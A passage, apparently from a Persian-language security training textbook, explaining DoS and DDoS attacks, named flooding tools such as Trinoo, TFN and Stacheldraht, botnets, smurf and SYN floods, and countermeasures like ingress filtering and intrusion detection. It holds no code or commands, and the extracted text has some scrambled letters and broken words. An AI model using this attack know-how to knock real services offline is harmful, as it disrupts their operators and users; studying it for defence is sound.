Targa ، ﺑﺮﻧﺎﻣﻪ اي اﺳﺖ ﻛﻪ ﻣﻲ ﺗﻮاﻧﺪ ﺑﺮاي اﺟﺮاي ﺣﻤﻼت ﻣﺨﺘﻠﻒ DoS اﺳﺘﻔﺎده ﺷﻮد . ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ ﻳﻚ ﻧﻮع ﺣﻤﻠﻪ را اﻧﺘﺨﺎب ﻛﻨﺪ و ﺳﭙﺲ آن را اﺟﺮا ﻛﻨﺪ و ﻳﺎ اﻳﻨﻜﻪ ﻫﻤﻪ ﻧﻮع ﺣﻤﻼت را اﻧﺠﺎم دﻫﺪ ﺗﺎ ﻳﻜﻲ از آﻧﻬﺎ ﻣﻮﻓﻘﻴﺖ آﻣﻴﺰ ﺑﺎﺷﺪ . .

RPC Locator ، ﺳﺮوﻳﺴﻲ اﺳﺖ ﻛﻪ ﺑﻪ ﺑﺮﻧﺎﻣﻪ ﻫﺎي ﺗﻮزﻳﻊ ﺷﺪه، اﺟﺎزه اﺟﺮا ﺑﺮ روي ﺷﺒﻜﻪ را ﻣﻲ دﻫﺪ . و ﻣﺴﺘﻌﺪ ﺣﻤﻼت DoS ﻫﺴﺘﻨﺪ و ﺑﺴﻴﺎري از ﺑﺮﻧﺎﻣﻪ ﻫﺎ ﻛﻪ ﺣﻤﻼت DoS را اﻧﺠﺎم ﻣﻲ دﻫﻨﺪ، از اﻳﻦ آﺳﻴﺐ ﭘﺬﻳﺮي اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﻨﺪ . .

ﺣ ﻤﻼت DDoS ﻣﻲ ﻧﺗﻮا ﻨﺪ ﺗﻮﺳﻂ BOT ﻫﺎ و BOTNET ﻫﺎ اﻧﺠﺎم ﺷﻮﻧﺪ ﻛﻪ ﺳﻴﺴﺘﻢ ﻫﺎ را ﺑﻪ ﺧﻄﺮ ﻣﻲ اﻧﺪازﻧ ﺪ و ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ ﺑﺮاي ﺣﻤﻠﻪ ﺑﻪ ﻛﺎرﺑﺮ ﻧﻬﺎﻳﻲ اﺳﺘﻔﺎده ﻛﻨﺪ . ﺳﻴﺴﺘﻢ ﻳﺎ ﺷﺒﻜﻪ اي ﻛﻪ ﺑﻪ ﺧﻄﺮ ﻣﻲ اﻓﺘﺪ، ﻗﺮﺑﺎﻧﻲ ﺛﺎﻧﻮﻳﻪ اﺳﺖ در ﺣﺎﻟﻴﻜﻪ ﺣﻤﻼت DoS و DDoS ، ﻗﺮﺑﺎﻧﻲ اوﻟﻲ را ﻣﻮرد ﻫﺪف ﻗﺮار ﻣﻲ دﻫﺪ . .

ﻧﺤﻮه ﻛﺎر ﺣﻤﻼت DDoS

ﺣﻤﻠﻪ DDoS ، ﻧﺴﺨﻪ ﭘﻴﺸﺮﻓﺘﻪ ﺣﻤﻠﻪ DoS اﺳﺖ . ﻫﻤﺎﻧﻨﺪ DoS ، ﺣﻤﻠﻪ DDoS ﻧﻴﺰ ﺗﻼش ﻣﻲ ﻛﻨﺪ ﺗﺎ ﺑﺎ ارﺳﺎل ﺑﺴﺘﻪ ﻫﺎ ﺑﻪ ﺳﻤﺖ ﺳﻴﺴﺘﻢ ﻣﻘﺼﺪ، دﺳﺘﺮﺳﻲ ﺑﻪ ﺳﺮوﻳﺴﻲ را ﻣﺨﺘﻞ ﻛﻨﺪ . ﻧﻜﺘﻪ ﻛﻠﻴﺪي ﺣﻤﻠﻪ DDoS ، اﻳﻦ اﺳﺖ ﻛﻪ ﺑﺠﺎي ﺣﻤﻠﻪ از ﻳﻚ ﺳﻴﺴﺘﻢ، از ﭼﻨﺪﻳﻦ ﺳﻴﺴﺘﻢ ﺑﺮاي اﻧﺠﺎم ﺣﻤﻠﻪ اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد . . 125

اﺑﺰارﻫﺎي ﻫﻚ Trinoo ، اﺑﺰاري اﺳﺖ ﻛﻪ ﺗﺮاﻓﻴﻚ UDP ارﺳﺎل ﻣﻲ ﻛﻨﺪ ﺗﺎ ﺣﻤﻠﻪ DDoS را اﻳﺠﺎد ﻛﻨﺪ . Trinoo master ، ﺳﻴﺴﺘﻤﻲ اﺳﺖ ﻛﻪ ﺑﺮاي اﺟﺮاي ﺣﻤﻠﻪ DoS ﺑﺮ ﻋﻠﻴﻪ ﻳﻚ ﻳﺎ ﭼﻨﺪ ﺳﻴﺴﺘﻢ ﻫﺪف اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد . Master ، ﭘﺮدازش ﻫﺎي agent ( daemons ﻧﺎﻣﻴﺪه ﻣﻲ ﺷﻮد ) روي ﺳﻴﺴﺘﻢ ﻫﺎي ﺑﻪ ﺧﻄﺮ اﻓﺘﺎده ﻗﺒﻠﻲ ﻣﻲ ﺳﺎزد ( ﻗﺮﺑﺎﻧﻲ ﺛﺎﻧﻮي ﺗﺎ) ﺑﻪ ﻳﻚ ﻳﺎ ﭼﻨﺪ آدرس IP ، ﺣﻤﻠﻪ ﻛﻨﺪ . اﻳﻦ ﺣﻤﻠﻪ، ﺑﺮاي ﻣﺪت زﻣﺎن ﻣﺸﺨﺼﻲ اﺗﻔﺎق ﻣﻲ اﻓﺘﺪ . Trinoo agent ﻳﺎ daemon ، روي ﺳﻴﺴﺘﻤﻲ ﻛﻪ آﺳﻴﺐ ﭘﺬﻳﺮي buffer overflow را دار د، ﻧﺼﺐ ﻣﻲ ﺷﻮد . WinTrinoo ، ﻧﺴﺨﻪ وﻳﻨﺪوزي Trinoo اﺳﺖ و ﺗﻤﺎم ﻴﻠﺑﺎﻗ ﺖ ﺎﻫ ﺎﻫ ﺖ را ﻣﺜﻞ Trinoo دارد . .

Shaft ، ﻣﺸﺘﻘﻲ از اﺑﺰار Trinoo اﺳﺖ ﻛﻪ از ارﺗﺒﺎﻃﺎت UDP ﺑﻴﻦ master ﻫﺎ و agent ﻫﺎ اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ . اﻳﻦ ﻧﺮم اﻓﺰار، اﻃﻼﻋﺎﺗﻲ درﺑﺎره ﺣﻤﻠﻪ flood ﻣﻲ دﻫﺪ ﻛﻪ ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ ﺑﺮاي داﻧﺴﺘﻦ اﻳﻨﻜﻪ ﭼﻪ زﻣﺎﻧﻲ ﺳﻴﺴﺘﻢ ﻗﺮﺑﺎﻧﻲ ﺧﺎﻣﻮش ﻣﻲ ﺷﻮد، اﺳﺘﻔﺎده ﻛﻨﺪ . Shaft ، داراي ﮔﺰﻳﻨﻪ ﻫﺎي ﺣﻤﻠﻪ ICMP ، UDP و TCP flooding اﺳﺖ . .

Stacheldraht ، ﻣﺸﺎﺑﻪ TFN اﺳﺖ و ﺷﺎﻣﻞ ﮔﺰﻳﻨﻪ ﻫﺎﻳﻲ ﺑﺮاي ﺣﻤﻼت UDP flood ، ICMP flood و TCP SYN اﺳﺖ . ﻫﻤﭽﻨﻴﻦ داراي ارﺗﺒﺎط telnet اﻣﻦ ( ﺑﺎ اﺳﺘﻔﺎده از رﻣﺰﮔﺬاري ﻛﻠﻴﺪ ﻣﺘﻘﺎرن ) ﺑﻴﻦ ﻫﻜﺮ و ﺳﻴﺴﺘﻢ ﻫﺎي agent ( ﻗﺮﺑﺎﻧﻲ ﻫﺎي ﺛﺎﻧﻮﻳﻪ ) اﺳﺖ . اﻳﻦ ﺳﺒﺐ ﻣﻲ ﺷﻮد ﻛﻪ ﻣﺪﻳﺮان ﺳﻴﺴﺘﻢ ﻫﺎ ﻧﺘﻮاﻧﻨﺪ اﻳﻦ ﺗﺮاﻓﻴﻚ را ﺷﻨﺎﺳﺎﻳﻲ ﻛﻨﻨﺪ . .

126

(Tribal Flood Network (TFN ، ﺑﻪ ﻫﻜﺮ اﻳﻦ اﻣﻜﺎن را ﻣﻲ دﻫﺪﻛﻪ ﺑﺘﻮاﻧﺪ از ﺣﻤﻼت bandwidth-depletion ( ﺗﻬﻲ ﺳﺎزي ﭘﻬﻨﺎي ﺑﺎﻧﺪ ) و resource-depletion ( ﺗﻬﻲ ﺳﺎزي ﻣﻨﺎﺑﻊ ) اﺳﺘﻔﺎده ﻛﻨﺪ . اﻳﻦ ﻧﺮم اﻓﺰار، داراي ﺣﻤﻼت UDP TCP SYN ، ICMP flooding ، flooding و smurf اﺳﺖ . TFN2K ﺑﺮ ﻣﺒﻨﺎ ي TFN اﺳﺖ ﺑﺎ اﻳﻦ ﺗﻔﺎوت ﻛﻪ داراي ﻗﺎﺑﻠﻴﺖ ﻫﺎﻳﻲ اﺳﺖ ﻛﻪ ﺗﺮاﻓﻴﻚ TFN2K ﺑﻪ ﺳﺨﺘﻲ ﺷﻨﺎﺳﺎﻳﻲ و ﻓﻴﻠﺘﺮ ﺷﻮد . ﺑﺼﻮرت راه دور دﺳﺘﻮرات را اﺟﺮا ﻣﻲ ﻛﻨﺪ، ﻣﻨﺒﻊ ﺣﻤﻠﻪ را ﺑﺎ اﺳﺘﻔﺎده از IP spoofing ﻣﺨﻔﻲ ﻣﻲ ﻛﻨﺪ و از ﭼﻨﺪﻳﻦ ﭘﺮوﺗﻜﻞ ﻻﻳﻪ اﻧﺘﻘﺎل ( transport ) ﻣﺜﻞ UDP ، TCP و ICMP اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ .

Mstream ، از ﺑﺴﺘﻪ ﻫﺎي TCP ﺟﻌﻠﻲ ﺑﺎ ACK flag ﺑﺮاي ﺣﻤﻠﻪ ﺑﻪ ﻫﺪف اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ و ﺷﺎﻣﻞ ﻳﻚ handler و ﻳﻚ ﺑﺨﺶ agent اﺳﺖ ﻛﻪ ﺑﺮاي دﺳﺘﺮﺳﻲ ﺑﻪ ﺑﺨﺶ handler ﻧﻴﺎز ﺑﻪ ﭘﺴﻮرد اﺳﺖ . .

ﺳﺮوﻳﺲ ﻫﺎﻳﻲ ﻛﻪ در ﺣﻤﻠﻪ ﻣﺨﺘﻞ ﻣﻲ ﺷﻮﻧﺪ را ﻗﺮﺑﺎﻧﻴ نﺎ ﻲﻠﺻا ، و ﺳﻴﺴﺘﻢ ﻫﺎﻳﻲ ﻛﻪ از آﻧﻬﺎ ﺑﺮاي اﻧﺠﺎم ﺣﻤﻠﻪ اﺳﺘﻔﺎده ﻣﻲ ﺷﻮﻧﺪ را ﻗﺮﺑﺎﻧﻴﺎن ﺛﺎﻧﻮي ﻳﺎ zombie ﻫﺎ ﻳﺎ BOT ﻫﺎ ﻣﻲ ﻧﺎﻣﻨﺪ . ﻣﻌﻤﻮﻻ اﻳﻦ ﺳﻴﺴﺘﻢ ﻫﺎ از ﻃﺮﻳﻖ ﺣﻤﻠﻪ دﻳﮕﺮي ﻫﻚ ﺷ هﺪ ﺪﻧا و ﺳﭙﺲ از آﻧﻬﺎ ﺑﺮاي اﻧﺠﺎم ﺣﻤﻠﻪ ﺑﺮ ﻋﻠﻴﻪ ﻗﺮﺑﺎﻧﻲ اﺻﻠﻲ در زﻣﺎن ﻳﺎ در ﺷﺮاﻳﻂ ﻣﺸﺨﺺ اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد . در اﻳﻦ ﺣﺎﻟﺖ، ردﻳﺎﺑﻲ ﺣﻤﻠﻪ دﺷﻮار اﺳﺖ ﺑﺮاي اﻳﻨﻜﻪ ﺣﻤﻠﻪ از ﻃﺮﻳﻖ ﭼﻨﺪﻳﻦ آدرس IP ﺷﻜﻞ ﮔﺮﻓﺘﻪ اﺳﺖ . .

در ﺣﺎﻟﺖ ﻃﺒﻴﻌﻲ، ﺣ ﻤﻠﻪ DDoS ﺷﺎﻣﻞ ﺳﻪ ﺑﺨﺶ اﺳﺖ : :

Master/ Handler • Slave/ secondary victim/ zombie/ agent/ BOT/ BOTNET • Victim/ primary victim •

ﻛﻪ master ، ﺷﺮوع ﻛﻨﻨﺪه ﺣﻤﻠﻪ اﺳﺖ . slave ، دﺳﺘﮕﺎﻫﻲ اﺳﺖ ﻛﻪ ﺗﻮﺳﻂ master ﺑﻪ ﺧﻄﺮ اﻓﺘﺎده اﺳﺖ . Vitim ، ﺳﻴﺴﺘﻢ ﻫﺪف اﺳﺖ . master ، دﺳﺘﮕﺎه ﻫﺎي slave را ﻫﺪاﻳﺖ ﻣﻲ ﻛﻨﺪ ﺗﺎ ﺑﺮ روي ﺳﻴﺴﺘﻢ ﻗﺮﺑﺎﻧﻲ، ﺣﻤﻠﻪ اﻧﺠﺎم دﻫ .ﺪﻨ .ﺪﻨ

127

ﺣﻤﻠﻪ DDoS ، در دو ﻣﺮﺣﻠﻪ اﻧﺠﺎم ﻣﻲ دﺮﻴﮔ . ﻫﻜﺮ در ﻣﺮﺣﻠﻪ intrusion ، ﺳﻴﺴﺘﻢ ﻫﺎي ﺿﻌﻴﻒ در ﺷﺒﻜﻪ ﻫﺎي ﻣﺨﺘﻠﻒ را ﺑﻪ دﺳﺖ ﻣﻲ ﮔﻴﺮد و اﺑﺰارﻫﺎي DDoS را روي ﺳﻴﺴﺘﻢ ﻫﺎي slave ﻧﺼﺐ ﻣﻲ ﻛﻨﺪ . در ﻣﺮﺣﻠﻪ attack ، ﺳﻴﺴﺘﻢ ﻫﺎي slave ، ﺑﺮاي اﻧﺠﺎم ﺣﻤﻠﻪ ﺑﻪ ﻗﺮﺑﺎﻧﻲ اﺻﻠﻲ اﻗﺪام ﻣﻲ ﻛﻨﻨﺪ . .

دﺳﺘﻪ ﺑﻨﺪي ﺣﻤﻼت DDoS : :

128

ﻧﺤﻮه ﻛﺎر BOT ﻫﺎ و BOTNET ﻫﺎ ﻫﺎ

BOT ، ﺧﻼﺻﻪ روﺑﺎت وب ( web robot ،) ﻧﺮم اﻓﺰاري ﺧﻮدﻛﺎر اﺳﺖ ﻛﻪ ﺑﺼﻮرت ﻫﻮﺷﻤﻨﺪاﻧﻪ ﻋﻤﻞ ﻣﻲ ﻛﻨﺪ . ﻣﻌﻤﻮﻻ ﻧﺮم اﻓﺰارﻫﺎي اﺳﭙﻢ ( spammer ﻫﺎ ) از BOT ﻫﺎ ﺑﺮاي ﺧﻮدﻛﺎر ﺳﺎزي ارﺳﺎل ﺑﺴﺘﻪ ﻫﺎي اﺳﭙﻢ ﺑﺮاي ﮔﺮوه ﻫﺎي ﺧﺒﺮي ﻳﺎ ارﺳﺎل اﻳﻤﻴﻞ اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﻨﺪ . ﻫﻤﭽﻨﻴﻦ BOT ﻫﺎ ﻣﻲ ﺗﻮاﻧﻨﺪ ﺑﻪ ﻋﻨﻮان اﺑﺰارﻫﺎي ﺣﻤﻠﻪ از راه دور ، اﺳﺘﻔﺎده ﺷﻮﻧﺪ . اﻏﻠﺐ، BOT ﻫﺎ، agent ﻫﺎي وﺑﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﺑﺎ ﺻﻔﺤﺎت وب ﺗﻌﺎﻣﻞ دارﻧﺪ . ﺑﺮاي ﻣﺜﺎل، web crawler (ﻫﺎ spider ،)ﻫﺎ روﺑﺎت ﻫﺎي وﺑﻲ ﻫﺴﺘﻨﺪ ﻛﻪ اﻃﻼﻋﺎت ﺻﻔﺤﺎت وب را ﺟﻤﻊ آوري ﻣﻲ ﻛﻨﻨﺪ . .

ﺧﻄﺮﻧﺎك ﺗﺮﻳﻦ BOT ﻫﺎ آﻧﻬﺎﻳﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﺧﻮد را ﺑﺼﻮرت ﻣﺨﻔ ﻴﺎﻧﻪ ﺑﺮ روي ﻛﺎﻣﭙﻴﻮﺗﺮ ﻛﺎرﺑﺮان ﻧﺼﺐ ﻣﻲ ﻛﻨﻨﺪ ﺗﺎ اﻫﺪاف ﺷﻮم ﺧﻮد را اﻧﺠﺎم دﻫﻨﺪ . ﺑﺮﺧﻲ از BOT ﻫﺎ، ﺑﺎ اﺳﺘﻔﺎده از IRC ﻳﺎ اﻳﻨﺘﺮﻓﻴﺲ ﻫﺎي دﻳﮕﺮ وب، ﺑﺎ ﻛﺎرﺑﺮان دﻳﮕﺮ ﺳﺮوﻳﺲ ﻫﺎي ﻣﺒﺘﻨﻲ ﺑﺮ وب، ارﺗﺒﺎط دارﻧﺪ . اﻳﻦ BOT ﻫﺎ اﻏﻠﺐ ﻣﻲ ﺗﻮاﻧﻨﺪ ﺑﺴﻴﺎري از وﻇﺎﻳﻒ را اﻧﺠﺎم دﻫﻨﺪ و ﮔﺰارش آب و ﻫﻮا، اﻃﻼﻋﺎت ﻛﺪ ﭘﺴﺘﻲ، ﻧﺘﺎﻳﺞ ورزش ﻫﺎ، ﺗﺒﺪﻳﻞ واﺣﺪﻫﺎ و اﻧﺪازه ﻫﺎ از ﻗﺒﻴﻞ ارز، و ... ار .ﺪﻧراد .ﺪﻧراد ار

BOTNET ، ﮔﺮوﻫﻲ از ﺳﻴﺴﺘﻢ ﻫﺎي BOT اﺳﺖ . BOTNET ﻫﺎ ﭼﻨﺪﻳﻦ ﻫﺪف دارﻧﺪ از ﻗﺒﻴﻞ ﺣﻤﻼت DDoS ، اﻳﺠﺎد ﻳﺎ ﺳﻮاﺳﺘﻔﺎده از SMTP ﺑﺮاي اﺳﭙﻢ، ﻛﻼﻫﺒﺮداري ﺑﺎزارﻳﺎﺑﻲ اﻳﻨﺘﺮﻧﺘﻲ، ﺳﺮﻗﺖ ﺷﻤﺎره ﺳﺮﻳﺎل ﻫﺎي ﺑﺮﻧﺎﻣﻪ ﻫﺎ، ﻧﺎم ﻫﺎي ﻛﺎرﺑﺮي، و اﻃﻼﻋﺎت ﻣﺎﻟﻲ از ﻗﺒﻴﻞ ﺷﻤﺎره ﻫﺎي ﻛﺎرت اﻋﺘﺒﺎري . ﺑﻄﻮر ﻛﻠﻲ، BOTNET ، ﺑﻪ ﮔﺮوﻫﻲ از ﺳﻴﺴﺘﻢ ﻫﺎي ﻫﻚ ﺷ هﺪ اﻃﻼق ﻣﻲ ﺷﻮد ﻛﻪ ﺑﻪ ﻣﻨﻈﻮر اﺟﺮاي ﺣﻤﻠﻪ DDoS ﻫﻤﺎﻫﻨﮓ ﺷﺪه، BOT را اﺟﺮا ﻣﻲ ﻨﻛ .ﻨﺪ .ﻨﺪ

129

ﺣﻤﻠﻪ smurf ﭼﻴﺴﺖ؟

ﺣﻤﻠﻪ smurf ، ﺗﻌﺪاد زﻳﺎدي ﺗﺮاﻓﻴﻚ ICMP لﺎﺳرا ﻣ ﻲ ﻨﻛ ﺪ ﺗﺎ آدرس ﻫﺎي IP ﺑﺎ آدرس ﻣﻨﺒﻊ ﺟﻌﻠﻲ ﺷﺪه ﻗﺮﺑﺎﻧﻲ را broadcast ﻛﻨﺪ . ﻫﺮ ﻣﺎﺷﻴﻦ ﻗﺮﺑﺎﻧﻲ ﺛﺎﻧﻮي ﻣﻮﺟﻮد ﺑﺮ روي ﺷﺒﻜﻪ، ﺑﻪ درﺧﻮاﺳﺖ ﻫﺎي ICMP ﭘﺎﺳﺦ ﻣﻲ دﻫﺪ و ﺑﺎ ﭘﺎﺳﺦ ﺑﻪ ﻣﺎﺷﻴﻦ ﻫﺎ، ﺗﺮاﻓﻴﻚ را ﺗﻜﺜﻴﺮ ﻣﻲ ﻛﻨﻨﺪ . در ﺷﺒﻜﻪ ﻫﺎي broadcast ﺑﺎ دﺳﺘﺮﺳﻲ ﭼﻨﺪﮔﺎﻧﻪ، ﻣﻤﻜﻦ اﺳﺖ ﺻﺪﻫﺎ ﻣﺎﺷﻴﻦ ﺑﻪ ﺑﺴﺘﻪ ﻫﺎ ﭘﺎﺳﺦ دﻫﻨﺪ . اﻳﻨ ﻜﺎر ﺑﺎﻋﺚ ﻣﻲ ﺷﻮد ﻛﻪ ﻳﻚ ﺣﻤﻠﻪ DoS از ﭘﺎﺳﺦ ﻫﺎي ping ﺑﺴﺎزد و ﻗﺮﺑﺎﻧﻲ اوﻟﻲ را flood ﻨﻛ ﻨﺪ . ﻨﺪ ﺳﺮورﻫﺎي IRC ، ﻗﺮﺑﺎﻧﻲ اوﻟﻴﻪ از ﺣﻤﻼت smurf روي اﻳﻨﺘﺮﻧﺖ ﻫﺴﺘﻨﺪ . .

SYN flooding ﭼﻴﺴﺖ؟

ﺣﻤﻠﻪ SYN flood ، درﺧﻮاﺳﺖ ﻫﺎي ارﺗﺒﺎط TCP را ﺳﺮﻳﻌﺘﺮ از زﻣﺎﻧﻴﻜﻪ ﻳﻚ ﻣﺎﺷﻴﻦ ﺑﺘﻮاﻧﺪ آﻧﻬﺎ را ﭘﺮدازش ﻛﻨﺪ، ارﺳﺎل ﻣﻲ ﻛﻨﺪ . ﻫﻜﺮ، ﺑﺮاي ﻫﺮ ﺑﺴﺘﻪ، آدرس ﻣﻨﺒﻊ ﺗﺼﺎدﻓﻲ ﺗﻮﻟﻴﺪ ﻣﻲ ﻛﻨﺪ و ﺑﻴﺖ SYN را ﺑﺮاي اﻳﺠﺎد درﺧﻮاﺳﺖ ارﺗﺒﺎط

130

ﺟﺪﻳﺪ ﺑﻪ ﺳﺮور از ﻃﺮف آدرس IP ﺟﻌﻠﻲ ، ﺳﺖ ﻣﻲ ﻛﻨﺪ . ﻗﺮﺑﺎﻧﻲ، ﺑﻪ آدرس IP ﺟﻌﻠﻲ ( spoofed ) ﭘﺎﺳﺦ ﻣﻲ دﻫﺪ و ﺳﭙﺲ ﺑﺮاي ﺗﺎﺋﻴﺪ TCP ﻣﻨﺘﻈﺮ ﻣﻲ ﻣﺎﻧﺪ وﻟﻲ ﻫﻴﭻ وﻗﺖ ﭘﺎﺳﺨﻲ درﻳﺎﻓﺖ ﻧﻤﻲ ﻛﻨﺪ . در ﻧﺘﻴﺠﻪ، ﺟﺪول ارﺗﺒﺎط ﻗﺮﺑﺎﻧﻲ ﺑﺎ ﺣﺎﻟﺖ ﻫﺎي " اﻧﺘﻈﺎر ﭘﺎﺳﺦ" ﭘﺮ ﻣﻲ ﺷﻮد و ارﺗﺒﺎﻃﺎت ﺟﺪﻳﺪ ﻧﺎدﻳﺪه ﮔﺮﻓﺘﻪ ﻣﻲ ﺷﻮﻧﺪ ﻛﺎرﺑﺮان ﻣﺸﺮوع، ﻧﺎدﻳﺪه ﮔﺮﻓﺘﻪ ﻣﻲ ﺷﻮﻧﺪ و ﻧﻤﻲ ﺗﻮاﻧﻨﺪ ﺑﻪ ﺳﺮور دﺳﺘﺮﺳﻲ داﺷﺘﻪ ﺑﺎﺷﻨﺪ . ﺑﺮﺧﻲ از روش ﻫﺎي ﺟﻠﻮﮔﻴﺮي از ﺣ ﻤﻼت SYN flood ، ﻋﺒﺎرﺗﻨﺪ از : SYN cookies ، Micro Blocks ، RST cookies و Stack Tweaking . .

ﻣﻘﺎﺑﻠﻪ ﺑﺎ DoS و DDoS

ﭼﻨﺪﻳﻦ روش ﺑﺮاي ﺷﻨﺎﺳﺎﻳﻲ، از ﺑﻴﻦ ﺑﺮدن ﻳﺎ ﺟﻠﻮﮔﻴﺮي از ﺣﻤﻼت DoS وﺟﻮد دارد . در زﻳﺮ ﻟﻴﺴﺖ ﺑﺮﺧﻲ از راﻳﺞ ﺗﺮﻳﻦ ﻗﺎﺑﻠﻴﺖ ﻫﺎي اﻣﻨﻴﺘﻲ ﻗﺎﺑﻞ دﺳﺘﺮس آورده ﺷﺪه اﺳﺖ : :

ﻓﻴﻠﺘﺮﻳﻨﮓ network-ingress: ﺗﻤﺎم ﻛﺴﺎﻧﻴﻜﻪ اﻣﻜﺎن دﺳﺘﺮﺳﻲ ﺑﻪ ﺷﺒﻜﻪ را ﻣﻲ دﻫﻨﺪ ﺑﺎﻳﺪ ﺑﺮاي ﺟﻠﻮﮔﻴﺮي از ﺗﺰرﻳﻖ ﺑﺴﺘﻪ ﻫﺎي ﺑﺎ آدرس ﻫﺎي ﺟﻌﻠﻲ ﺑﻪ اﻳﻨﺘﺮﻧﺖ ، از ﻓﻴﻠﺘﺮﻳﻨﮓ network-ingress اﺳﺘﻔﺎده ﻛﻨﻨﺪ . ﻫﺮ ﭼﻨﺪ ﻛﻪ اﻳﻨ ﻜﺎر از ﺑﺮوز ﺣﻤﻠﻪ ﭘﻴﺸﮕﻴﺮي ﻧ ﻤﻲ ﻛﻨﻨﺪ ، اﻣﺎ ردﮔﻴﺮي ﻣﻨﺒﻊ ﺣﻤﻠﻪ و ﻣﺘﻮﻗﻒ ﺳﺎﺧﺘﻦ آن را ﺧﻴﻠﻲ ﺳﺮﻳﻊ ﺗﺮ ﻣﻲ ﻛﻨﺪ . .

ﺗﺮاﻓﻴﻚ ﺷﺒﻜﻪ rate-limiting: ﺴﺑ رﺎﻴ ي از روﺗﺮﻫﺎي ﻣﻮﺟﻮد در ﺑﺎزار، ﻗﺎﺑﻠﻴﺖ ﻫﺎﻳﻲ ﻛﻪ ﺑﻪ ﺷﻤﺎ اﺟﺎزه ﻣﺤﺪود ﺳﺎﺧﺘﻦ ﻣﻘﺪار ﭘﻬﻨﺎي ﺑﺎﻧﺪ ﺑﻌﻀﻲ از ﺗﺮاﻓﻴﻚ ﻫﺎ را ﻣﻲ دﻫﻨﺪ، وﺟﻮد دارﻧﺪ . اﻳﻦ ﻗﺎﺑﻠﻴﺖ ﺑﺎ ﻧﺎم traffic shaping ﻧﻴﺰ ﺷﻨﺎﺧﺘﻪ ﻣﻲ ﺷﻮد . .

ﺳﻴﺴﺘﻢ ﻫﺎي ﺗﺸﺨﻴﺺ ﻧﻔﻮذ: ﺑﺮاي ﺷﻨﺎﺳﺎﻳﻲ ﻫﻜﺮﻫﺎﻳﻲ ﻛﻪ ﺑ ﺎ ﻣﺎﺷﻴﻦ ﻫﺎي slave ، master ﻳﺎ agent ارﺗﺒﺎط ﺑﺮﻗﺮار ﻣﻲ ﻛﻨﻨﺪ، از ﺳﻴﺴﺘﻢ ﻫﺎي ﺗﺸﺨﻴﺺ ﻧﻔﻮذ اﺳﺘﻔﺎده ﻛﻨﻴﺪ . اﺳﺘﻔﺎده از آن، اﻳﻦ اﻣﻜﺎن را ﻣﻲ دﻫﺪ ﻛﻪ ﺑﺪاﻧﻴﺪ آﻳﺎ ﻣﺎﺷﻴﻨﻲ ﺑﺮ روي ﺷﺒﻜﻪ، ﺑﺮاي اﻧﺠﺎم ﺣﻤﻠﻪ ﺷﻨﺎﺧﺘﻪ ﺷﺪه اي اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد ﻳﺎ ﻧﻪ . اﻣﺎ ﻣﻤﻜﻦ اﺳﺖ ﺣﻤﻼت ﻳﺎ اﺑﺰارﻫﺎي ﺟﺪﻳﺪي را ﺷﻨﺎﺳﺎﻳﻲ ﻧﻜﻨﺪ . ﺑﺴﻴﺎري از ﺳﺎزﻧﺪﮔﺎن IDS ، ﺑﺮاي ﺷﻨﺎﺳﺎﻳﻲ ﺗﺮاﻓﻴﻚ ﺷﺒﻜﻪ اي TFN ، Trinoo ﻳﺎ Stacheldraht ، از signature اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﻨﺪ . .

اﺑﺰارﻫﺎي Host-auditing: اﺑﺰارﻫﺎﻳ ﻲ ﺑﺮاي اﺳﻜﻦ ﻓﺎﻳﻞ وﺟﻮد دارﻧﺪ ﻛﻪ ﺗﻼش ﻣﻲ ﻛﻨﻨﺪ ﺗﺎ اﺑﺰارﻫﺎي ﻛﻼﻳﻨﺘﻲ و ﺳﺮوري DDoS را در ﻳﻚ ﺳﻴﺴﺘﻢ ﺷﻨﺎﺳﺎﻳﻲ ﻛﻨﻨﺪ . .

اﺑﺰارﻫﺎي Network-auditing: اﺑﺰارﻫﺎي اﺳﻜﻦ ﺷﺒﻜﻪ اي ﻫﺴﺘﻨﺪ ﻛﻪ ﺗﻼش ﻣﻲ ﻛﻨﻨﺪ agent ﻫﺎي DDoS ﻛﻪ در ﻣﺎﺷﻴﻦ ﻫﺎ ﻳﺎ در ﺷﺒﻜﻪ ﺷﻤﺎ وﺟﻮد دارﻧﺪ را ﺷﻨﺎﺳﺎﻳﻲ ﻛﻨﻨﺪ . .

اﺑﺰارﻫﺎي ﺧﻮدﻛﺎر ردﻳﺎﺑﻲ ﺷﺒﻜﻪ: ردﮔﻴﺮي ﺟﺮﻳﺎن ﺑﺴﺘﻪ ﻫﺎ در ﺷﺒﻜﻪ ﺑﺎ آدرس ﻫﺎي ﺟﻌﻠﻲ، ﻛﺎر زﻣﺎن ﮔﻴﺮي اﺳﺖ ﻛﻪ ﺑﻪ ﻫﻤﻜﺎري ﺑﻴﻦ ﺗﻤﺎم ﺷﺒﻜﻪ ﻧﻴﺎز دارد ﺗﺎ ﺗﺮاﻓﻴﻚ را اﻧﺘﻘﺎل دﻫﺪ و ﺑﺎﻳﺪ در زﻣﺎﻧﻴﻜﻪ ﺣﻤﻠﻪ در ﺣﺎل اﻧﺠﺎم اﺳﺖ، ﺻﻮرت ﮔﻴﺮد . .

131

اﺑﺰارﻫﺎي ﻫﻚ Find_ddos ، اﺑﺰاري ياﺮﺑ ﺳا ﻜ ﻦ ﺳﻴﺴﺘﻢ ﻣﺤﻠﻲ ﺳا ﺖ ﻛﻪ ﻣﻲ ﺗﻮاﻧﺪ ﺑﺴﻴﺎري از ﺑﺮﻧﺎﻣﻪ ﻫﺎي ﺷﻨﺎﺧﺘﻪ ﺷﺪه ﺑﺮاي ﺣﻤﻠﻪ DoS را ﺷﻨﺎﺳﺎﻳﻲ ﻛﻨﺪ . .

